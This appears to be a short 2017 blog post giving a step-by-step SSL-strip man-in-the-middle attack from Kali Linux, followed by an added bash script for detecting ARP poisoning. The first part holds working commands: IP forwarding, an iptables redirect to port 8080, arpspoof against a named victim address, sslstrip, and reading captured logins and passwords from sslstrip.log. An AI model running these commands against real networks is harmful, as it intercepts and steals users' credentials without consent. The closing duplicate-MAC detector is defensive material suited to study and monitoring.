Wednesday, March 22, 2017

SSL Strip

On the Kali machine

* Open a Terminal
netdiscover

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j  REDIRECT --to-port 8080

arpspoof -i eth0 -t 10.10.1.55 -r 10.10.1.111

* Open another Terminal
sslstrip -l 8080

Once the victim machine accesses any login website, such as Facebook, Gmail, or Yahoo, we will be able to see the login name and password, which are stored in the file sslstrip.log on Kali.

* Open another Terminal and read the log to see the name and password
cat sslstrip.log
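
From the defending side, the arpspoof step leaves a trace on the poisoned host: the spoofed IP resolves to the same MAC as another address in the neighbor table whenever the table also holds the spoofing machine's real IP. The script below is an added example, not part of the original post; the function name find_duplicate_macs, the MAC addresses, and the addresses 10.10.1.200, 10.10.1.20 and 10.10.1.77 are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: flag MAC addresses that answer for more than one IP
# in a neighbor table given in "ip neigh" output format.

# Constructed sample of the neighbor table on 10.10.1.55 while it is being
# poisoned. MAC addresses and every IP except 10.10.1.111 are made up.
SAMPLE_NEIGH='10.10.1.111 dev eth0 lladdr 00:0C:29:AA:BB:CC REACHABLE
10.10.1.200 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
10.10.1.20 dev eth0 lladdr 00:0c:29:11:22:33 REACHABLE
10.10.1.77 dev eth0  FAILED'

# find_duplicate_macs: reads "ip neigh" lines on stdin and prints one line
# per MAC bound to two or more distinct IPs, as: <mac> <ip1>,<ip2>,...
find_duplicate_macs() {
  awk '
    {
      mac = ""
      for (i = 1; i < NF; i++)
        if ($i == "lladdr") mac = tolower($(i + 1))
      if (mac == "") next          # FAILED/INCOMPLETE entries carry no MAC
      key = mac SUBSEP $1
      if (key in seen) next        # same IP listed twice is not a conflict
      seen[key] = 1
      count[mac]++
      if (count[mac] == 1) ips[mac] = $1
      else                 ips[mac] = ips[mac] "," $1
    }
    END {
      for (m in count)
        if (count[m] > 1) print m, ips[m]
    }
  ' | sort
}

# On a live Linux host: ip -4 neigh show | find_duplicate_macs
printf '%s\n' "$SAMPLE_NEIGH" | find_duplicate_macs
```

A hit is a lead to investigate rather than proof, since routers with several addresses and proxy ARP also produce one MAC for many IPs.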